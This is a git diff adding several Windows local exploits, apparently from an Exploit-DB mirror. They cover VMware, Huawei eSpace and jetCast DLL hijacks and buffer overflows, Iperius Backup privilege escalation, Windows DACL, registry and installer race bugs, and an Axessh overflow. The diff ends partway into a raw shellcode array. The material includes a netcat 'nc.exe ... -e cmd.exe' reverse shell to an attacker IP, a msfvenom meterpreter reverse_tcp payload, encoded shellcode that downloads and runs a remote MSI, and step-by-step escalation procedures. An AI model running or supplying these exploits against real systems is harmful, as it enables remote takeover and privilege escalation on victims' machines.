+#---------------------------------------------------------
+# Title: VMware Workstation DLL hijacking < 15.1.0
+# Date: 2019-05-14
+# Author: Miguel Mendez Z. & Claudio Cortes C.
+# Team: www.exploiting.cl
+# Vendor: https://www.vmware.com
+# Version: VMware Workstation Pro / Player (Workstation)
+# Tested on: Windows Windows 7_x86/7_x64 [eng]
+# Cve: CVE-2019-5526
+#---------------------------------------------------------
+
+
+Description:
+
+VMware Workstation contains a DLL hijacking issue because some DLL.
+
+
+DLL Hijacking: shfolder.dll
+Hooking: SHGetFolderPathW()
+
+------Code_Poc-------
+#include "dll.h"
+#include <windows.h>
+
+DLLIMPORT void SHGetFolderPathW()
+{
+MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
+exit(0);
+}
+
+--------------------------
+
+
+https://www.vmware.com/security/advisories/VMSA-2019-0007.html
\ No newline at end of file
diff --git a/exploits/windows/local/46854.py b/exploits/windows/local/46854.py
new file mode 100755
index 000000000..a709f66cb
--- /dev/null
+++ b/exploits/windows/local/46854.py
@@ -0,0 +1,88 @@
+# Title: JetAudio jetCast Server 2.0 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow
+# Date: May 13th, 2019
+# Author: Connor McGarr (https://connormcgarr.github.io)
+# Vendor Homepage: http://www.jetaudio.com/
+# Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe
+# Version v2.0
+# Tested on: Windows XP SP3 EN
+
+# TO RUN:
+# 1. Run python script
+# 2. Copy contents of pwn.txt
+# 3. Open jetCast
+# 4. Select Config
+# 5. Paste contents of pwn.txt into "Log directory" field
+# 6. Click "OK"
+# 7. Click "Start"
+
+# For zeroing out registers before manual shellcode
+zero = "\x25\x01\x01\x01\x01"           	# and eax, 0x01010101
+zero += "\x25\x10\x10\x10\x10"          	# and eax, 0x10101010
+
+# Save old stack pointer
+restore = "\x54"                                # push esp
+restore += "\x59"                               # pop ecx
+restore += "\x51"                               # push ecx
+
+# Align the stack to 0012FFAD. Leaving enough room for shell. Using calc.exe for now.
+# 4C4F5555 4C4F5555 4D505555
+alignment = "\x54"				# push esp
+alignment += "\x58"				# pop eax
+alignment += "\x2d\x4c\x4f\x55\x55"		# and eax, 0x4C4F5555
+alignment += "\x2d\x4c\x4f\x55\x55"		# and eax, 0x4C4F5555
+alignment += "\x2d\x4d\x50\x55\x55"		# and eax, 0x4D505555
+alignment += "\x50"				# push eax
+alignment += "\x5c"				# pop esp
+
+# calc.exe - once again, giving you enough room with alignment for shell. Calc.exe for now.
+# 2C552D14 01552D14 01562E16
+shellcode = zero
+shellcode += "\x2d\x14\x2d\x55\x2c" 		# sub eax, 0x2C552D14
+shellcode += "\x2d\x14\x2d\x55\x01" 		# sub eax, 0x01562D14
+shellcode += "\x2d\x16\x2e\x56\x01" 		# sub eax, 0x01562E16
+shellcode += "\x50" 				# push eax
+
+# 24121729 24121739 2414194A
+shellcode += zero
+shellcode += "\x2d\x29\x17\x12\x24" 		# sub eax, 0x24121729
+shellcode += "\x2d\x39\x17\x12\x24"     	# sub eax, 0x24121739
+shellcode += "\x2d\x4a\x19\x14\x24"     	# sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A)
+shellcode += "\x50" 				# push eax
+
+# 34313635 34313434 34313434
+shellcode += zero
+shellcode += "\x2d\x35\x36\x31\x34" 		# sub eax, 0x34313635
+shellcode += "\x2d\x34\x34\x31\x34" 		# sub eax, 0x34313434
+shellcode += "\x2d\x34\x34\x31\x34" 		# sub eax, 0x34313434
+shellcode += "\x50" 				# push eax
+
+# 323A1245 323A1245 333A1245
+shellcode += zero
+shellcode += "\x2d\x45\x12\x3a\x32" 		# sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x32" 		# sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x33" 		# sub eax, 0x333A1245
+shellcode += "\x50"				# push eax
+
+# Restore old stack pointer. MOV ECX,ESP
+move = zero
+move += "\x2d\x40\x3f\x27\x11" 			# sub eax, 0x403F2711
+move += "\x2d\x3f\x3f\x27\x11" 			# sub eax, 0x3F3F2711
+move += "\x2d\x3f\x3f\x28\x11" 			# sub eax, 0x3F3F2811
+move += "\x50" 					# push eax
+
+
+payload = "\x41" * 520
+payload += "\x70\x06\x71\x06"			# JO 6 bytes. If jump fails, default to JNO 6 bytes into shellcode.
+payload += "\x2d\x10\x40\x5f"			# pop pop ret MFC42.DLL
+payload += "\x41" * 2				# Padding to reach first instruction
+payload += restore
+payload += alignment
+payload += shellcode
+payload += move
+# Using ECX for holding old ESP. \x41 = INC ECX
+# so using \x42 = INC EDX instead.
+payload += "\x42" * (5000-len(payload))
+
+f = open('pwn.txt', 'w')
+f.write(payload)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46863.txt b/exploits/windows/local/46863.txt
new file mode 100644
index 000000000..c00885b8d
--- /dev/null
+++ b/exploits/windows/local/46863.txt
@@ -0,0 +1,62 @@
+Exploit Author: bzyo
+Twitter: @bzyo_
+Exploit Title: Iperius Backup 6.1.0 - Privilege Escalation
+Date: 04-24-19
+Vulnerable Software: Iperius Backup 6.1.0
+Vendor Homepage: https://www.iperiusbackup.com/
+Version: 6.1.0
+Software Link: https://www.iperiusbackup.com/download.aspx
+Tested on: Windows 10 x64
+
+Details:
+Iperius Backup Service must run as Local System or a system administrator. By default the application allows for low privilege users to create/run backup jobs and edit existing jobs due to file permissions.  An option when creating a backup job is to run a program before or after the backup job.  The backup job is run as the user of the running service, as such the program requested to run before or after a backup job is run as that same user.  A low privilege user could abuse this and escalate their privileges to either local system or an administrator account.
+
+Vendor Post - Installation as Windows service: what it is and why it’s important
+https://www.iperiusbackup.net/en/installation-windows-service-iperius-backup/
+
+Prerequisites:
+To successfully exploit this vulnerability, an attacker must already have local access 
+to a system running Iperius Backup and Iperius Backup Service using a
+low privileged user account
+
+Exploit:
+1. Login as low privilege user where Iperius Backup and Iperius Backup Service are installed
+
+2. Download netcat  from attacking machine
+	 c:\users\low\downloads\nc.exe
+	 
+3. Create batch file calling netcat and sending command prompt to attacking machine
+	c:\users\low\desktop\evil.bat
+		@echo off
+		c:\users\low\downloads\nc.exe 192.168.0.163 443 -e cmd.exe
+
+4. Setup listener on attacking machine
+	nc -nlvvp 443
+
+5. Open Iperius Backup and create new backup job
+	- set any folder to backup (c:\temp)
+	- set to any destination (c:\users\low\desktop)
+	- set program to run before backup job (c:\users\low\desktop\evil.bat)
+
+6. Right-click on newly created job and select "Run backup service as"
+	- will either be local system or administrator account
+
+7. Command prompt on attacking machine will appear
+	C:\Program Files (x86)\Iperius Backup>whoami
+	whoami
+	<computer name>\<administrator>
+
+	Or
+	
+	C:\Program Files (x86)\Iperius Backup>whoami
+	whoami
+	nt authority\system
+
+Risk:
+The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System or Administrator
+
+Notes:
+Able to open elevated command prompt locally if service is running as local system, but not when using an administrator account.  Also able to backup entire administrator user profile as low privilege account.
+
+Fix:
+Remove Everyone permission to folder c:\ProgramData\IperiusBackup
\ No newline at end of file
diff --git a/exploits/windows/local/46866.c b/exploits/windows/local/46866.c
new file mode 100644
index 000000000..5ee598dc2
--- /dev/null
+++ b/exploits/windows/local/46866.c
@@ -0,0 +1,53 @@
+/*
+
+Huawei eSpace Desktop DLL Hijacking Vulnerability
+
+
+Vendor: Huawei Technologies Co., Ltd.
+Product web page: https://www.huawei.com
+Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
+
+Summary: Create more convenient Enhanced Communications (EC) services for your
+enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
+voice, data, video, and service streams, and provides users with easy and secure
+access to their service platform from any device, in any place, at any time. The
+eSpace Meeting allows you to join meetings that support voice, data, and video
+functions using the PC client, the tablet client, or an IP phone, or in a meeting
+room with an MT deployed.
+
+Desc: eSpace suffers from a DLL Hijacking issue. The vulnerability is caused due
+to the application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and 
+airpcap.dll) in an insecure manner. This can be exploited to load arbitrary libraries
+by tricking a user into opening a related application file (.html, .jpg, .png)
+located on a remote WebDAV or SMB share.
+
+Tested on: Microsoft Windows 7 Professional
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+
+19.08.2014
+
+Patched version: V200R003C00
+Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154
+CVE ID: CVE-2014-9416
+Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589
+
+*/
+
+
+// gcc -shared -o mfc71enu.dll exploit.c
+
+#include <windows.h> 
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
+{
+	exec();
+	return 0;
+}
+
+int exec()
+{
+	WinExec("calc.exe" , SW_NORMAL);
+	return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows/local/46912.txt b/exploits/windows/local/46912.txt
new file mode 100644
index 000000000..1948c8a61
--- /dev/null
+++ b/exploits/windows/local/46912.txt
@@ -0,0 +1,58 @@
+Windows: CmKeyBodyRemapToVirtualForEnum Arbitrary Key Enumeration EoP
+Platform: Windows 10 1809 (not tested earlier)
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary: 
+
+The kernel’s Registry Virtualization doesn’t safely open the real key for a virtualization location leading to enumerating arbitrary keys resulting in EoP.
+
+Description:
+
+When the virtualization flag is set on the primary token certain parts of the HKLM\Software hive are virtualized to a per-user location under Software\Classes. If the key exists in HKLM (and can be virtualized) then a handle to the HKLM key is opened read-only and the virtualized key is only created if any modification is made to the key, such as writing a value.
+
+However, if a virtualized key already exists then that key is opened and the real key is only opened on demand. One reason to open the backing key is if the virtual key is enumerated, to provide compatibility the kernel will merge the key/value information from the real key into the virtual key. The real key is opened every time a call is made to NtEnumerateKey, NtQueryValue etc.
+
+The open of the real key is performed in CmKeyBodyRemapToVirtualForEnum. It first constructs the real path to the key using CmpReparseToVirtualPath then opens the key object using ObReferenceObjectByName. The problem here is two fold:
+1) The access mode passed to ObReferenceObjectByName is KernelMode which means security checking is disabled.
+2) The open operation will follow symbolic links in the registry.
+
+When combined together these two issues allow a normal user to redirect a real key to an arbitrary registry location, as security checking is disabled then it will open any key including the SAM or BCD hives. The only requirement is finding a virtualizable key inside HKLM which is writable by the normal user. There’s a number of examples of this, but the easiest and ironic one to exploit is the HKLM\SOFTWARE\Microsoft\DRM key. In order to get the virtualization to work you do need to create a new subkey, without any virtualization flags (the DRM key can be virtualized anyway) with a security descriptor which limits the user to read-only but grants the administrator group full access. This will meet the virtualization criteria, and as the key is in HKLM which is a trusted hive then any symbolic link can reparse to any other hive. This can be exploited as follows:
+
+1) Create a new subkey of DRM which can only be written to by an administrator (just pass an appropriate security descriptor). This should be done with virtualization disabled.
+2) Open the new subkey requesting read and write access with virtualization enabled. Write a value to the key to cause it to be virtualized then close it.
+3) Reopen the subkey requesting read and write access with virtualization enabled.
+4) Replace the new subkey in DRM with a symlink to \Registry\Machine\SAM\SAM. 
+5) Enumerate keys or values of the virtual key, it should result in the SAM hive being opened and enumerated. Repeat the process to dump all data from the hive as needed.
+
+Fixing wise, I’m not really sure why the real key is opened without any access checking as the code should have already checked that the user could open the real key for read-only in order to create the virtual key and if the call fails it doesn’t seem to impact the enumeration process, just it doesn’t return the data. You might try and block symbolic link reparsing, but passing OBJ_OPEN_LINK isn’t sufficient as you could replace a key higher up the key path which is the actual symbolic link.
+
+These operations can’t be done from any sandbox that I know of so it’s only a user to system privilege escalation. 
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will use the vulnerability to enumerate the top level of the SAM hive.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC. 
+3) The PoC should print the subkeys of the SAM hive.
+
+Expected Result:
+The query operation should fail.
+
+Observed Result:
+The SAM hive key is opened and enumerated.
+
+Some additional notes.
+
+I said this wasn’t exploitable from a sandbox but that turns out to be incorrect. It’s possible to mark a registry key as being a virtual store key using NtSetInformationKey with the KeySetVirtualizationInformation and passing a value of 1. When you do this the kernel always considers it to be a virtualized key for the purposes of enumeration, as long as the virtualization enabled flag is set when calling NtEnumerateKey it’ll call CmKeyBodyRemapToVirtualForEnum. 
+
+The path to the real registry key is generated by CmVirtualKCBToRealPath (not CmpReparseToVirtualPath as I said in the original report as that's the other direction) which just removes the first 4 path elements from the virtual key path and prepends \Registry. For example if you open the key \Registry\User\S-1-1-1\SOFTWARE\MACHINE\XYZ it’ll get mapped to \Registry\MACHINE\XYZ. 
+
+You can exploit this in an AC by creating a new application hive through RegLoadAppKey which will be mapped to \Registry\A\XYZ then creating a directory structure underneath that. For example if you load the app key, then create the subkeys ABC\MACHINE\SAM\SAM and mark the last one as a virtualized key then when opened with virtualization enabled you can now enumerate the SAM hive. I expect this can even be done from an Microsoft Edge Content Process as loading an application hive isn’t restricted, in fact it’s important for AC functionality.
+
+There’s a few places that call CmVirtualKCBToRealPath so I’d probably check their usage is correct as this behavior is odd. Of course I’d argue that CmVirtualKCBToRealPath should be more rigorous and also at a minimum you probably shouldn’t be able to set virtualization flags on application hives in general.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46912.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46916.txt b/exploits/windows/local/46916.txt
new file mode 100644
index 000000000..b6c8ab157
--- /dev/null
+++ b/exploits/windows/local/46916.txt
@@ -0,0 +1,30 @@
+edit: Figure out how this works for yourself. I can't be bothered. It's a really hard race, doubt anyone will be able to repro anyway. Could be used with malware, you could programmatically trigger the rollback. Maybe you can even pass the silent flag to hide installer UI and find another way to trigger rollback (i.e through installer api, injecting into medium IL msiexec etc)
+
+## Installer - capturing rolback scripts - patch bypass #2
+
+There is still a race condition in the installer.
+
+So there is a really small timing window to win a race, where if we set a junction after the check but before it writes the DACL we can still get our original PoC to work.
+
+Again, it's a really small timing window, and while it appears to reliably reproduce on my setup.. I don't know if it will for yours. I've attached a procmon.exe log.
+
+How to reproduce:
+
+1. Run polarbear.exe (make sure to copy test.rbf and test.rbs in the same directory)
+
+2. Open a cmd and run an installer (has to be an autoelevating installer in c:\windows\insatller) this way "msiexec /fa c:\windows\installer\123123213.msi"
+When we pass the repair flag, it usually gives us a little more time to press the cancel button and trigger rollback. 
+polarbear.exe will print out when you have to press cancel. So you don't press it too early!
+
+3. If all is successful it will write oops.dll to system32. If failed.. make sure to delete the following folders: config.msi, new, new2, new3.
+Use the included video demo as guide... as the process is kind of complicated!
+
+Filter I used in procmon:
+
+You should see this on a successful run:
+
+The mount point on c:\config.msi has to be create after querynetworkfile and before setsecurityfile.
+
+
+
+EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46916.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46917.txt b/exploits/windows/local/46917.txt
new file mode 100644
index 000000000..7436589b4
--- /dev/null
+++ b/exploits/windows/local/46917.txt
@@ -0,0 +1,51 @@
+EDIT: Apparently this was patched earlier this month.. so whatever.
+
+Windows Error Reporting Arbitrary DACL write
+
+It can take upwards of 15 minutes for the bug to trigger. If it takes too long, closing the program, cleaning out the reportarchive folder in programdata (it may mess up the timing if there's too many reports in there as result of running our poc for too long), deleting the c:\blah folder.. etc.. might help. 
+
+I guess a more determined attacker might be able to make it more reliable. It is just an insanely small window in which we can win our race, I wasn't even sure if I could ever exploit it at all. 
+
+I don't see a way to use OPLOCKS to reliably win the race.. and while I can make it work fairly reliable in my VM, I need to use a "rand()" function to bruteforce a delay needed to hit the correct timing.. because this timing will vary wildly from hardware setup to setup.
+
+Overview:
+
+1. We turn c:\programdata\microsoft\windows\wer\reportqueue into a junction point to c:\blah 
+
+2. In c:\blah we create a folder named 1_1_1_1_1, and inside we dump a .wer file and another file called test
+
+3. We trigger the WER reporting queue task
+
+4. When the service tries to write a DACL we delete the file "test" after it calls GetSecurityFile on it and replace it with a hardlink, on which the service will call SetSecurityFile.
+
+Bug description:
+
+The WER service will try to delete both files while not impersonating when we trigger the reporting queue task. It does extensive testing against junctions.. so we cannot abuse that.
+
+However it will write a DACL to both files, to ensure that SYSTEM has the "delete" right over them. The way this works is in two steps:
+
+1. It calls GetFileSecurity and gets a security descriptor (or whatever the technical name is)
+
+2. It adds some stuff to the security descriptor so SYSTEM has delete rights, and then writes it back to the file using SetFileSecurity
+
+It also closes file handles between both function calls which is convenient.
+
+This means that if between both function calls we plant a hardlink.. it will first get the security descriptor from a normal file which authenticated users can write to. It will then copy these permissions, and applies this security descriptor to a hardlink pointing to an entirely different file.
+
+The race condition is incredibly hard to win. I havn't tested on another setup.. but you definitely need multiple processor cores and you may have to wait minutes for it to work (It can take a really long time.. ). Anyway... in an LPE scenario time is not that much of an issue. 
+
+A succesful run will look like this. You can see the hardlink being created after the QuerySecurityFile and before SetSecurityFile.
+
+You can also ofcourse look in IDA (wer.dll) and confirm there. The vulnerable function is: UtilAddAccessToPath
+
+Steps to reproduce:
+
+1. Copy AngryPolarBearBug.exe and report.wer into the same folder
+
+2. Run AngryPolarBearBug.exe
+
+After many long minutes it should stop and c:\windows\system32\drivers\pci.sys should now by writeable from non-admin.
+
+Again.. I have only tested this on both my VM and host, I don't even know if the random delay range will work on other hardware setups (it basically tries to bruteforce the correct timing).. so I hope you can repo it.
+
+EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46917.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46918.txt b/exploits/windows/local/46918.txt
new file mode 100644
index 000000000..e491bc7a1
--- /dev/null
+++ b/exploits/windows/local/46918.txt
@@ -0,0 +1,72 @@
+Task Scheduler .job import arbitrary DACL write
+
+Tested on: Windows 10 32-bit
+
+Bug information:
+
+There are two folders for tasks.
+
+c:\windows\tasks
+
+c:\windows\system32\tasks
+
+The first one is only there for legacy purposes. The second one gets used by the task scheduler.
+
+In the old days (i.e windows xp) tasks would be placed in c:\windows\tasks in the ".job" fileformat. 
+
+If on windows 10 you want to import a .job file into the task scheduler you have to copy your old .job files into c:\windows\tasks and run the following command using "schtasks.exe and schedsvc.dll" copied from the old system: "schtasks /change /TN "taskname" /RU username /RP password" 
+
+(found this here: https://social.technet.microsoft.com/Forums/windowsserver/en-US/467e5cab-2368-42de-ae78-d86b644a0e71/transfer-scheduled-tasks-to-server-2008?forum=winserverMigration)
+
+This will result in a call to the following RPC "_SchRpcRegisterTask", which is exposed by the task scheduler service. (I assume that to trigger this bug you can just call into this function directly without using that schtasks.exe copied from windows xp.. but I am not great at reversing :(   )
+
+It starts out by impersonating the current user.
+
+But when it hits the following function: 
+
+int __stdcall tsched::SetJobFileSecurityByName(LPCWSTR StringSecurityDescriptor, const unsigned __int16 *, int, const unsigned __int16 *)
+
+It starts impersonating itself (NT AUTHORITY\SYSTEM)! 
+
+And then calls SetSecurityInfo on a task it created in c:\windows\system32\tasks.
+
+
+
+
+This can be easily abused.
+
+The PoC code:
+
+CopyFile(L"bear.job", L"c:\\windows\\tasks\\bear.job",FALSE);
+	system(command.c_str());
+	DeleteFile(L"c:\\windows\\system32\\tasks\\Bear");
+	CreateNativeHardlink(L"c:\\windows\\system32\\tasks\\bear", L"C:\\Windows\\system32\\drivers\\pci.sys");
+	system(command.c_str());
+
+First we copy bear .job into the legacy tasks folder.
+
+Then we call "schtasks /change /TN "bear" /RU username /RP password" 
+
+We have to call it "normally" first without planting a hardlink because otherwise it will fail, since the task already exists in c:\windows\system32\task.
+
+After that we delete the file it created. And plant a hardlink and re-run the same command.
+
+This time it will call SetSecurityInfo on our hardlink.
+
+How to run the PoC (you need to rebuild for x64, included binary is x86)
+
+1. copy polarbear.exe, bear.job, schtasks.exe, schtasks.dll from the folder "poc files" to your test VM
+
+2. run polarbear.exe passing a username and password of a local non admin account. I.e "polarbear.exe essbee polarbear"
+
+You can use the included video demo as reference.
+
+Solution?
+
+Make sure it impersonates the user! :D
+
+Limitations
+
+Obviously to run to PoC we have to pass a username and password. However, this can be the account information of a local non admin account, meaning it still crosses a security boundary. But for malware it would be harder to use this, since it's not that easy to obtain a cleartext password and even if we call _SchRpcRegisterTask directly, it still has a struct _TASK_USER_CRED argument, and I assume this expects clear text account info and not a token or something. Maybe you can use the Guest account or something when calling _schrpcregistertask directly.
+
+EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46918.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46919.txt b/exploits/windows/local/46919.txt
new file mode 100644
index 000000000..3619aacad
--- /dev/null
+++ b/exploits/windows/local/46919.txt
@@ -0,0 +1,7 @@
+Inject into IE11.
+
+Will work on other sandboxes that allow the opening of windows filepickers through a broker.
+
+You will gain medium IL javascript execution, at which point you simply retrigger your IE RCE bug.
+
+EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46919.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46920.txt b/exploits/windows/local/46920.txt
new file mode 100644
index 000000000..98910ce6a
--- /dev/null
+++ b/exploits/windows/local/46920.txt
@@ -0,0 +1,9 @@
+# CVE-2019-0803
+Win32k Elevation of Privilege Poc
+
+Reference
+-----------------------------
+(steal Security token) https://github.com/mwrlabs/CVE-2016-7255
+
+
+EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46920.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46922.py b/exploits/windows/local/46922.py
new file mode 100755
index 000000000..042596d94
--- /dev/null
+++ b/exploits/windows/local/46922.py
@@ -0,0 +1,42 @@
+# Title: Axessh 4.2 - 'Log file name'  Local Stack-based Buffer Overflow
+# Date: May 23rd, 2019
+# Author: Uday Mittal (https://github.com/yaksas443/YaksasCSC-Lab/)
+# Vendor Homepage: http://www.labf.com
+# Software Link: http://www.labf.com/download/axessh.exe
+# Version v4.2
+# Tested on: Windows 7 SP1 EN (x86)
+# Reference: https://www.exploit-db.com/exploits/46858
+
+# TO RUN:
+# 0. Setup a multi/handler listener
+# 1. Run python script
+# 2. Copy contents of axssh.txt
+# 3. Open telnet_S.exe
+# 4. Select Details >> Settings >> Logging
+# 5. Select Log all Session Output radio button
+# 6. Paste the contents in Log file name
+# 7. Press "OK"
+# 8. Press "OK"
+
+# EIP offset: 214
+# 0x050e3f04 : push esp # ret  | ascii {PAGE_EXECUTE_READ} [ctl3d32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v2.31.000 (C:\Windows\system32\ctl3d32.dll)
+
+
+#77da395c - Address of LoadLibraryA() for Windows 7 SPI x86
+#777db16f - Address of system() for Windows 7 SPI x86
+#77da214f - Address of ExitProcess for Windows 7 SPI x86
+
+# Shellcode Reference: https://www.exploit-db.com/shellcodes/46281
+# Payload command command: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.163 LPORT=4444 EXITFUNC=seh -f msi > /var/www/html/ms.msi
+# When the payload runs, it floods the system with Command windows and sends back a meterpreter shell. The shell does not die even if the user closes the application.
+
+
+filename = "axssh.txt"
+
+msiScode = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xda\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x20\x2f\x71\x6e\x68\x2e\x6d\x73\x69\x68\x33\x2f\x6d\x73\x68\x36\x2e\x31\x36\x68\x38\x2e\x31\x32\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x2f\x69\x20\x68\x68\x78\x65\x63\x20\x68\x6d\x73\x69\x65\x89\xe7\x57\xb8\x6f\xb1\x7d\x77\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xda\x77"
+
+evilString = "\x90" * 110 + msiScode + "\x90" * 6 + "\x04\x3f\x0e\x05" + "\x90"*4 + "\x89\xE0\x83\xE8\x7F\x89\xC4\xEB\x81" + "\x90" * 800
+
+file = open(filename,'w')
+file.write(evilString)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46938.txt b/exploits/windows/local/46938.txt
new file mode 100644
index 000000000..72801024d
--- /dev/null
+++ b/exploits/windows/local/46938.txt
@@ -0,0 +1,28 @@
+There is still a vuln in the code triggered by CVE-2019-0841
+
+The bug that this guy found: https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/
+
+If you create the following:
+
+(GetFavDirectory() gets the local appdata folder, fyi)
+
+CreateDirectory(GetFavDirectory() + L"\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe",NULL);
+CreateNativeHardlink(GetFavDirectory() + L"\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe\\bear3.txt", L"C:\\Windows\\win.ini");
+
+If we create that directory and put an hardlink in it, it will write the DACL.
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe this part (i.e 44.17763.1.0) has to reflect the currently installed edge version, you will need to mofidy this in the PoC (polarbear.exe) if different.
+You can find this by opening edge -> settings and scrolling down.
+Best thing is to just create a folder and hardlink for all the recent edge versions when writing an exploit. But I guess you can also probably get the installed version programmatically.
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+
+
+To repro:
+
+1. Run polarbear.exe
+2. Run windowsappslpe.exe (doesn't matter what file you pass in commandline.. will just make win.ini write-able.. rewrite the original PoC yourself)
+
+Use the vide demo as guidance..
+
+EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46938.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46945.cpp b/exploits/windows/local/46945.cpp
new file mode 100644
index 000000000..4fa5cfbe0
--- /dev/null
+++ b/exploits/windows/local/46945.cpp
@@ -0,0 +1,540 @@
+#include "hd.h"
+
+// EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945.rar
+
+
+byte __s_code[]={
+	0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 ,
+	0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 ,
+	0x4C ,0x89 ,0x70 ,0x10 ,0x90 ,0x65 ,0x48 ,0x8B ,0x04 ,0x25 ,0x30 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8B ,
+	0x40 ,0x60 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x8B ,0x78 ,0x18 ,0x48 ,0x8B ,0x47 ,0x10 ,0x48 ,0x83 ,
+	0xC7 ,0x10 ,0x48 ,0x3B ,0xC7 ,0x0F ,0x84 ,0x99 ,0x01 ,0x00 ,0x00 ,0x48 ,0xBB ,0x65 ,0x00 ,0x6C ,
+	0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x48 ,0xBE ,0x2E ,0x00 ,0x64 ,0x00 ,0x6C ,0x00 ,0x6C ,0x00 ,0x49 ,
+	0xBA ,0x6B ,0x00 ,0x65 ,0x00 ,0x72 ,0x00 ,0x6E ,0x00 ,0x48 ,0xBD ,0x4B ,0x00 ,0x45 ,0x00 ,0x52 ,
+	0x00 ,0x4E ,0x00 ,0x49 ,0xB8 ,0x45 ,0x00 ,0x4C ,0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x49 ,0xB9 ,0x2E ,
+	0x00 ,0x44 ,0x00 ,0x4C ,0x00 ,0x4C ,0x00 ,0x66 ,0x0F ,0x1F ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,
+	0x66 ,0x83 ,0x78 ,0x58 ,0x18 ,0x48 ,0x8B ,0x48 ,0x60 ,0x72 ,0x25 ,0x48 ,0x8B ,0x11 ,0x49 ,0x3B ,
+	0xD2 ,0x75 ,0x0C ,0x48 ,0x39 ,0x59 ,0x08 ,0x75 ,0x06 ,0x48 ,0x39 ,0x71 ,0x10 ,0x74 ,0x1E ,0x48 ,
+	0x3B ,0xD5 ,0x75 ,0x0C ,0x4C ,0x39 ,0x41 ,0x08 ,0x75 ,0x06 ,0x4C ,0x39 ,0x49 ,0x10 ,0x74 ,0x0D ,
+	0x48 ,0x8B ,0x00 ,0x48 ,0x3B ,0xC7 ,0x75 ,0xC8 ,0xE9 ,0x17 ,0x01 ,0x00 ,0x00 ,0x48 ,0x8B ,0x78 ,
+	0x30 ,0x48 ,0x85 ,0xFF ,0x0F ,0x84 ,0x0A ,0x01 ,0x00 ,0x00 ,0x48 ,0x63 ,0x47 ,0x3C ,0xB9 ,0x4D ,
+	0x5A ,0x00 ,0x00 ,0x66 ,0x39 ,0x0F ,0x0F ,0x85 ,0xF8 ,0x00 ,0x00 ,0x00 ,0x81 ,0x3C ,0x38 ,0x50 ,
+	0x45 ,0x00 ,0x00 ,0x0F ,0x85 ,0xEB ,0x00 ,0x00 ,0x00 ,0x44 ,0x8B ,0x8C ,0x38 ,0x88 ,0x00 ,0x00 ,
